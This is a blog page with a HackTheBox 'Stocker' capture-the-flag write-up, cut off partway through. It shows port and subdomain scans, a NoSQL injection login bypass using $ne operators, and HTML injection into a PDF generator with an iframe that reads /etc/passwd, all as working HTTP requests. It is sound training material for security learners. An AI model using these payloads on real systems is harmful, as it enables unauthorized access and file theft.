<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Stocker - HackTheBox | Nehal Zaman</title>
<meta name="generator" content="Jekyll v4.3.1" />
<meta property="og:title" content="Stocker - HackTheBox" />
<meta name="author" content="Nehal Zaman" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A perpetual learner. CTF player. Programmer." />
<meta property="og:description" content="A perpetual learner. CTF player. Programmer." />
<link rel="canonical" href="http://localhost:4000/posts/stocker_htb.html" />
<meta property="og:url" content="http://localhost:4000/posts/stocker_htb.html" />
<meta property="og:site_name" content="Nehal Zaman" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-01-21T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Stocker - HackTheBox" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Nehal Zaman"},"dateModified":"2023-01-21T00:00:00-05:00","datePublished":"2023-01-21T00:00:00-05:00","description":"A perpetual learner. CTF player. Programmer.","headline":"Stocker - HackTheBox","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/stocker_htb.html"},"url":"http://localhost:4000/posts/stocker_htb.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>Nehal Zaman</h1>
        </a>
        <h2>A perpetual learner. CTF player. Programmer.</h2>

        <section id="downloads">
          
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>21 January 2023</small>
<h1>Stocker - HackTheBox</h1>

<p class="view">by Nehal Zaman</p>

<p><img src="/assets/images/writeups/stocker/banner.png" alt="" /></p>

<h1 id="introduction">INTRODUCTION</h1>

<p><strong>Stocker</strong> is a nice and straight-forward box created by <a href="https://www.hackthebox.com/home/users/profile/269501">JoshSH</a> on <a href="https://www.hackthebox.com/home">HackTheBox</a>.</p>

<p>It involves exploiting an injection vulnerability, followed by an arbitrary file read vulnerability leading to retrieval of sensitive information that gives access to the box.</p>

<p>Finally, root on this box is obtained by exploiting a misconfigured sudo permission.</p>

<h1 id="scanning">SCANNING</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~]
└─<span class="nv">$ </span>rustscan <span class="nt">-a</span> 10.10.11.196 <span class="nt">-r</span> 1-65535 <span class="nt">--ulimit</span> 5000                           
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| <span class="o">{}</span>  <span class="o">}</span>| <span class="o">{</span> <span class="o">}</span> |<span class="o">{</span> <span class="o">{</span>__ <span class="o">{</span>_   _<span class="o">}{</span> <span class="o">{</span>__  /  ___<span class="o">}</span> / <span class="o">{}</span> <span class="se">\ </span>|  <span class="sb">`</span>| |
| .-. <span class="se">\|</span> <span class="o">{</span>_<span class="o">}</span> |.-._<span class="o">}</span> <span class="o">}</span> | |  .-._<span class="o">}</span> <span class="o">}</span><span class="se">\ </span>    <span class="o">}</span>/  /<span class="se">\ </span> <span class="se">\|</span> |<span class="se">\ </span> |
<span class="sb">`</span>-<span class="s1">' `-'</span><span class="sb">`</span><span class="nt">-----</span><span class="s1">'`----'</span>  <span class="sb">`</span>-<span class="s1">'  `----'</span>  <span class="sb">`</span><span class="nt">---</span><span class="s1">' `-'</span>  <span class="sb">`</span>-<span class="s1">'`-'</span> <span class="sb">`</span>-<span class="s1">'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/n3hal/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.196:22
Open 10.10.11.196:80
[~] Starting Script(s)
[&gt;] Script to be run Some("nmap -vvv -p  ")

[~] Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-21 01:31 EST
Initiating Ping Scan at 01:31
Scanning 10.10.11.196 [2 ports]
Completed Ping Scan at 01:31, 0.26s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:31
Completed Parallel DNS resolution of 1 host. at 01:31, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 1, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 01:31
Scanning 10.10.11.196 [2 ports]
Discovered open port 22/tcp on 10.10.11.196
Discovered open port 80/tcp on 10.10.11.196
Completed Connect Scan at 01:31, 0.28s elapsed (2 total ports)
Nmap scan report for 10.10.11.196
Host is up, received syn-ack (0.26s latency).
Scanned at 2023-01-21 01:31:43 EST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds

</span></code></pre></div></div>

<p>A quick rustscan reveals port <strong>22</strong> and <strong>80</strong> to be open on the box.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~]
└─<span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p22</span>,80 10.10.11.196                  
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2023-01-21 01:33 EST
Nmap scan report <span class="k">for </span>10.10.11.196
Host is up <span class="o">(</span>1.0s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 3d:12:97:1d:86:bc:16:16:83:60:8f:4f:06:e6:d5:4e <span class="o">(</span>RSA<span class="o">)</span>
|   256 7c:4d:1a:78:68:ce:12:00:df:49:10:37:f9:ad:17:4f <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 <span class="nb">dd</span>:97:80:50:a5:ba:cd:7d:55:e8:27:ed:28:fd:aa:3b <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Did not follow redirect to http://stocker.htb
|_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>57.53 seconds

</code></pre></div></div>

<p>Obviously, there is <strong>SSH</strong> service on port 22 and <strong>web</strong> service on port 80.</p>

<p>NMAP scan also reveals a domain name <code class="language-plaintext highlighter-rouge">stocker.htb</code>. It is required to add it to the <code class="language-plaintext highlighter-rouge">/etc/hosts</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~]
└─<span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p80</span> stocker.htb
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2023-01-21 01:38 EST
Nmap scan report <span class="k">for </span>stocker.htb <span class="o">(</span>10.10.11.196<span class="o">)</span>
Host is up <span class="o">(</span>1.0s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-generator: Eleventy v2.0.0
|_http-title: Stock - Coming Soon!
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>29.05 seconds

</code></pre></div></div>

<h1 id="enumerating-web">ENUMERATING WEB</h1>

<p><img src="/assets/images/writeups/stocker/1.png" alt="" /></p>

<p>The website seems to be a static site with no signs of user interaction that can be exploitted.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~]
└─<span class="nv">$ </span>wfuzz <span class="nt">-c</span> <span class="nt">-u</span> http://stocker.htb/FUZZ <span class="nt">-w</span> /usr/share/wordlists/dirb/big.txt <span class="nt">--hc</span> 404
<span class="k">********************************************************</span>
<span class="k">*</span> Wfuzz 3.1.0 - The Web Fuzzer                         <span class="k">*</span>
<span class="k">********************************************************</span>

Target: http://stocker.htb/FUZZ
Total requests: 20469

<span class="o">=====================================================================</span>
ID           Response   Lines    Word       Chars       Payload                                                                                                                               
<span class="o">=====================================================================</span>

000005517:   301        7 L      12 W       178 Ch      <span class="s2">"css"</span>                                                                                                                                 
000007427:   200        0 L      4 W        1150 Ch     <span class="s2">"favicon.ico"</span>                                                                                                                         
000007795:   301        7 L      12 W       178 Ch      <span class="s2">"fonts"</span>                                                                                                                               
000009464:   301        7 L      12 W       178 Ch      <span class="s2">"img"</span>                                                                                                                                 
000010190:   301        7 L      12 W       178 Ch      <span class="s2">"js"</span>                                                                                                                                  

Total <span class="nb">time</span>: 2419.557
Processed Requests: 20469
Filtered Requests: 20464
Requests/sec.: 8.459812

</code></pre></div></div>

<p>Directory fuzzing did not reveal anything interesting here.</p>

<h1 id="subdomain-enumeration">SUBDOMAIN ENUMERATION</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~]
└─<span class="nv">$ </span>wfuzz <span class="nt">-c</span> <span class="nt">-w</span> /home/n3hal/Tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt <span class="nt">-H</span> <span class="s1">'Host: FUZZ.stocker.htb'</span> <span class="nt">--hw</span> 12 <span class="nt">-f</span> subs.txt 10.10.11.196
<span class="k">********************************************************</span>
<span class="k">*</span> Wfuzz 3.1.0 - The Web Fuzzer                         <span class="k">*</span>
<span class="k">********************************************************</span>

Target: http://10.10.11.196/
Total requests: 4989

<span class="o">=====================================================================</span>
ID           Response   Lines    Word       Chars       Payload                                                                                                                               
<span class="o">=====================================================================</span>

000000019:   302        0 L      4 W        28 Ch       <span class="s2">"dev"</span>                                                                                                                                 

Total <span class="nb">time</span>: 289.9951
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 17.20373

</code></pre></div></div>

<p>Subdomain fuzzing with <code class="language-plaintext highlighter-rouge">SecLists</code>’s <code class="language-plaintext highlighter-rouge">subdomains-top1million-5000.txt</code> reveals a subdomain <code class="language-plaintext highlighter-rouge">dev</code>.</p>

<p>It is required to add <code class="language-plaintext highlighter-rouge">dev.stocker.htb</code> to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file.</p>

<h1 id="back-to-web-enumeration">BACK TO WEB ENUMERATION</h1>

<p><img src="/assets/images/writeups/stocker/2.png" alt="" /></p>

<p>When requesting the homepage of <code class="language-plaintext highlighter-rouge">http://dev.stocker.htb/</code>, we are redirected to a login page at <code class="language-plaintext highlighter-rouge">/login</code>.</p>

<p>Default credentails like <code class="language-plaintext highlighter-rouge">admin:admin</code>, <code class="language-plaintext highlighter-rouge">admin:password</code>, <code class="language-plaintext highlighter-rouge">admin:stocker</code>, <code class="language-plaintext highlighter-rouge">stocker:stocker</code>, <code class="language-plaintext highlighter-rouge">stockeradmin:stockeradmin</code> etc. does not work here.</p>

<p>So if we are required to get past this login page, it is definitely got to be a server side vulnerability here.</p>

<h1 id="discovering-nosql-injection">DISCOVERING NOSQL INJECTION</h1>

<p>The obvious vulnerability when it comes to a login page situation is <code class="language-plaintext highlighter-rouge">injection</code> related vulnerability.</p>

<p>Common SQL injection payloads for authentication bypass does not provide any results here. SQLmap can also be used for detecting SQL injection if at all it is vulnerable to this.</p>

<p>However, the server side response headers reveal that we have an <code class="language-plaintext highlighter-rouge">Express</code> application here.</p>

<p>Hence, it would be more useful if we test for <code class="language-plaintext highlighter-rouge">NoSQLi</code> instead of traditional SQL injection.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid<span class="o">=</span>s%3AbJDgribzFlsxX6bWGc2SXpNYUW4JptWX.mZxgaHsLBo3x1QVe%2BJ0dWssycRJ6jSJkOelyyA2%2Fd9A
Upgrade-Insecure-Requests: 1

<span class="nv">username</span><span class="o">=</span>admin&amp;password<span class="o">=</span>admin

</code></pre></div></div>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 21 Jan 2023 07:53:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 92
Connection: close
X-Powered-By: Express
Location: /login?error=login-error
Vary: Accept

<span class="nt">&lt;p&gt;</span>Found. Redirecting to <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"/login?error=login-error"</span><span class="nt">&gt;</span>/login?error=login-error<span class="nt">&lt;/a&gt;&lt;/p&gt;</span>

</code></pre></div></div>

<p>A normal login request with <code class="language-plaintext highlighter-rouge">admin:admin</code> as credentials responds with a <code class="language-plaintext highlighter-rouge">302</code> status code and redirects us back to <code class="language-plaintext highlighter-rouge">/login</code> with the <code class="language-plaintext highlighter-rouge">error</code> parameter. Well, this is expected as the credentials are not right.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Content-Type: application/json
Content-Length: 49
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid<span class="o">=</span>s%3AbJDgribzFlsxX6bWGc2SXpNYUW4JptWX.mZxgaHsLBo3x1QVe%2BJ0dWssycRJ6jSJkOelyyA2%2Fd9A
Upgrade-Insecure-Requests: 1

<span class="o">{</span><span class="s2">"username"</span>:<span class="o">{</span><span class="s2">"</span><span class="nv">$ne</span><span class="s2">"</span>: <span class="s2">"x"</span><span class="o">}</span>,<span class="s2">"password"</span>:<span class="o">{</span><span class="s2">"</span><span class="nv">$ne</span><span class="s2">"</span>: <span class="s2">"y"</span><span class="o">}}</span>

</code></pre></div></div>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 21 Jan 2023 07:58:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 56
Connection: close
X-Powered-By: Express
Location: /stock
Vary: Accept

<span class="nt">&lt;p&gt;</span>Found. Redirecting to <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"/stock"</span><span class="nt">&gt;</span>/stock<span class="nt">&lt;/a&gt;&lt;/p&gt;</span>

</code></pre></div></div>

<p>Now, here are few things worth noting:</p>

<ul>
  <li>In the request, the <code class="language-plaintext highlighter-rouge">Content-Type</code> is changed to <code class="language-plaintext highlighter-rouge">application/json</code>.</li>
  <li>In the request body, a JSON object is being sent instead of URL-encoded POST parameters.</li>
  <li>What is most important here, is the content that are being sent in JSON object.</li>
</ul>

<p>If the application supports injecting arbitrary objects/dictionaries in the user-controllable part, a malicious user can inject sub-dictionaries containing NoSQL operators which can lead to the manipulation of the logic of NoSQL query.</p>

<p>Here, the <code class="language-plaintext highlighter-rouge">username</code> key has value <code class="language-plaintext highlighter-rouge">{"$ne": "x"}</code>. The <code class="language-plaintext highlighter-rouge">$ne</code> is basically a NoSQL operator meaning <code class="language-plaintext highlighter-rouge">not equal to</code>. So the logic is something like <em><strong>find the user whose username is not equal to ‘x’</strong></em>. The similar thing can be explained for <code class="language-plaintext highlighter-rouge">password</code> field.</p>

<p>Obviously, there must not be any user whose <code class="language-plaintext highlighter-rouge">username</code> is <code class="language-plaintext highlighter-rouge">x</code> and password is <code class="language-plaintext highlighter-rouge">y</code>. So the backend query should return valid user details, and we must be able to authenticate ourselves, which is evident from the response redirection to <code class="language-plaintext highlighter-rouge">/stock</code> instead of <code class="language-plaintext highlighter-rouge">/login</code>.</p>

<p>Hence, here is a NoSQL injection which is used to bypass authentication.</p>

<h1 id="discovering-arbitrary-file-read-vulnerability">DISCOVERING ARBITRARY FILE READ VULNERABILITY</h1>

<p>Upon logged in, a user is redirected to <code class="language-plaintext highlighter-rouge">/stock</code>.</p>

<p><img src="/assets/images/writeups/stocker/3.png" alt="" /></p>

<p>It is basically a shop website, where a user can add some objects to basket, view his basket and then checkout.</p>

<p><img src="/assets/images/writeups/stocker/4.png" alt="" /></p>

<p>After checking out, a PDF is generated detailing the purchase history of the user.</p>

<p>The PDF reflects the <code class="language-plaintext highlighter-rouge">name</code> of the product and the <code class="language-plaintext highlighter-rouge">price</code>.</p>

<p><img src="/assets/images/writeups/stocker/5.png" alt="" /></p>

<p>Now this is interesting for us.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: <span class="k">*</span>/<span class="k">*</span>
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 195
Connection: close
Cookie: connect.sid<span class="o">=</span>s%3AbJDgribzFlsxX6bWGc2SXpNYUW4JptWX.mZxgaHsLBo3x1QVe%2BJ0dWssycRJ6jSJkOelyyA2%2Fd9A

<span class="o">{</span><span class="s2">"basket"</span>:[<span class="o">{</span><span class="s2">"_id"</span>:<span class="s2">"638f116eeb060210cbd83a8d"</span>,<span class="s2">"title"</span>:<span class="s2">"&lt;h1&gt;&lt;u&gt;Nehal Hacks For Good&lt;/u&gt;&lt;/h1&gt;"</span>,<span class="s2">"description"</span>:<span class="s2">"It's a red cup."</span>,<span class="s2">"image"</span>:<span class="s2">"red-cup.jpg"</span>,<span class="s2">"price"</span>:32,<span class="s2">"currentStock"</span>:4,<span class="s2">"__v"</span>:0,<span class="s2">"amount"</span>:1<span class="o">}]}</span>

</code></pre></div></div>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 21 Jan 2023 08:21:27 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 53
Connection: close
X-Powered-By: Express
ETag: W/"35-Tzjn01Rk42SDueMgKwQNQcjXLvw"

{"success":true,"orderId":"63cba087436910054f762153"}

</code></pre></div></div>

<p>While making an order, the <code class="language-plaintext highlighter-rouge">title</code> key’s value is changed to <code class="language-plaintext highlighter-rouge">&lt;h1&gt;&lt;u&gt;Nehal Hacks For Good&lt;/u&gt;&lt;/h1&gt;</code>.</p>

<p>In the response, the <code class="language-plaintext highlighter-rouge">id</code> of generated pdf is sent.</p>

<p><img src="/assets/images/writeups/stocker/6.png" alt="" /></p>

<p>It is seen that the injected HTML tags are successfully rendered. So we can inject arbitrary HTML tags now.</p>

<p>HTML injections can be escalated to arbitrary file read vulnerability through the <code class="language-plaintext highlighter-rouge">iframe</code> tags. The source of the <code class="language-plaintext highlighter-rouge">iframe</code> must be the name of the file we want to read.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="nt">&lt;iframe</span> <span class="na">frameborder=</span><span class="s">'0'</span> <span class="na">height=</span><span class="s">'750'</span> <span class="na">scrolling=</span><span class="s">'no'</span> <span class="na">src=</span><span class="s">'/etc/passwd'</span> <span class="na">width=</span><span class="s">'750'</span><span class="nt">&gt;&lt;/iframe&gt;</span>

</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: <span class="k">*</span>/<span class="k">*</span>
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 250
Connection: close
Cookie: connect.sid<span class="o">=</span>s%3AbJDgribzFlsxX6bWGc2SXpNYUW4JptWX.mZxgaHsLBo3x1QVe%2BJ0dWssycRJ6jSJkOelyyA2%2Fd9A

<span class="o">{</span><span class="s2">"basket"</span>:[<span class="o">{</span><span class="s2">"_id"</span>:<span class="s2">"638f116eeb060210cbd83a8d"</span>,<span class="s2">"title"</span>:<span class="s2">"&lt;iframe frameborder='0' height='750' scrolling='no' src='/etc/passwd' width='750'&gt;&lt;/iframe&gt;"</span>,<span class="s2">"description"</span>:<span class="s2">"It's a red cup."</span>,<span class="s2">"image"</span>:<span class="s2">"red-cup.jpg"</span>,<span class="s2">"price"</span>:32,<span class="s2">"currentStock"</span>:4,<span class="s2">"__v"</span>:0,<span class="s2">"amount"</span>:1<span class="o">}]}</span>

</code></pre></div></div>

<p><img src="/assets/images/writeups/stocker/7.png" alt="" /></p>

<p>The source of the <code class="language-plaintext highlighter-rouge">iframe</code> is <code class="language-plaintext highlighter-rouge">/etc/passwd</code>, and in the PDF we can see the contents of <code class="language-plaintext highlighter-rouge">/etc/passwd</code>.</p>

<p>The box has a user called <code class="language-plaintext highlighter-rouge">angoose</code>.</p>

<h1 id="retrieving-sensitive-information">RETRIEVING SENSITIVE INFORMATION</h1>

<p>Using the arbitrary file read, we can not read the <code class="language-plaintext highlighter-rouge">SSH</code> keys of the user.</p>

<p>In such cases, it is useful to read source code of the application to find any hardcoded secrets.</p>

<p>But for that, we first need to leak the path of the source code.</p>

<p>That can be easily done by simply invoking an error.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: <span class="k">*</span>/<span class="k">*</span>
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 10
Connection: close
Cookie: connect.sid<span class="o">=</span>s%3AbJDgribzFlsxX6bWGc2SXpNYUW4JptWX.mZxgaHsLBo3x1QVe%2BJ0dWssycRJ6jSJkOelyyA2%2Fd9A

<span class="o">{</span><span class="s2">"basket"</span>:

</code></pre></div></div>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
HTTP/1.1 400 Bad Request
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 21 Jan 2023 08:38:55 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 953
Connection: close
X-Powered-By: Express
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff

<span class="cp">&lt;!DOCTYPE html&gt;</span>
<span class="nt">&lt;html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">&gt;</span>
<span class="nt">&lt;head&gt;</span>
<span class="nt">&lt;meta</span> <span class="na">charset=</span><span class="s">"utf-8"</span><span class="nt">&gt;</span>
<span class="nt">&lt;title&gt;</span>Error<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>
<span class="nt">&lt;pre&gt;</span>SyntaxError: Unexpected end of JSON input<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at JSON.parse (<span class="ni">&amp;lt;</span>anonymous<span class="ni">&amp;gt;</span>)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at parse (/var/www/dev/node_modules/body-parser/lib/types/json.js:89:19)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at /var/www/dev/node_modules/body-parser/lib/read.js:128:18<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at AsyncResource.runInAsyncScope (node:async_hooks:203:9)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at invokeCallback (/var/www/dev/node_modules/raw-body/index.js:231:16)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at done (/var/www/dev/node_modules/raw-body/index.js:220:7)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at IncomingMessage.onEnd (/var/www/dev/node_modules/raw-body/index.js:280:7)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at IncomingMessage.emit (node:events:513:28)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at endReadableNT (node:internal/streams/readable:1359:12)<span class="nt">&lt;br&gt;</span> <span class="ni">&amp;nbsp;</span> <span class="ni">&amp;nbsp;</span>at process.processTicksAndRejections (node:internal/process/task_queues:82:21)<span class="nt">&lt;/pre&gt;</span>
<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>

</code></pre></div></div>

<p>In the order request, a malformed JSON object is sent. Obviously the server spits some errors.</p>

<p>The error contains the path of the application which is at: <code class="language-plaintext highlighter-rouge">/var/www/dev</code>.</p>

<p>Now, we also need to know the name of the server application. Commonly developers tend to use names like <code class="language-plaintext highlighter-rouge">index.js</code>, <code class="language-plaintext highlighter-rouge">app.js</code> or sometimes <code class="language-plaintext highlighter-rouge">server.js</code>.</p>

<p>Luckily, <code class="language-plaintext highlighter-rouge">index.js</code> works, and we can see the source code of the application.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: <span class="k">*</span>/<span class="k">*</span>
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 260
Connection: close
Cookie: connect.sid<span class="o">=</span>s%3AeswVmx8Xj3fWdbDyZkXnmL7Trz4KD0ED.CQnWD9TtWWM2AA%2BD4WHqa61FXdp8WsIdCGiQ22dK8V0

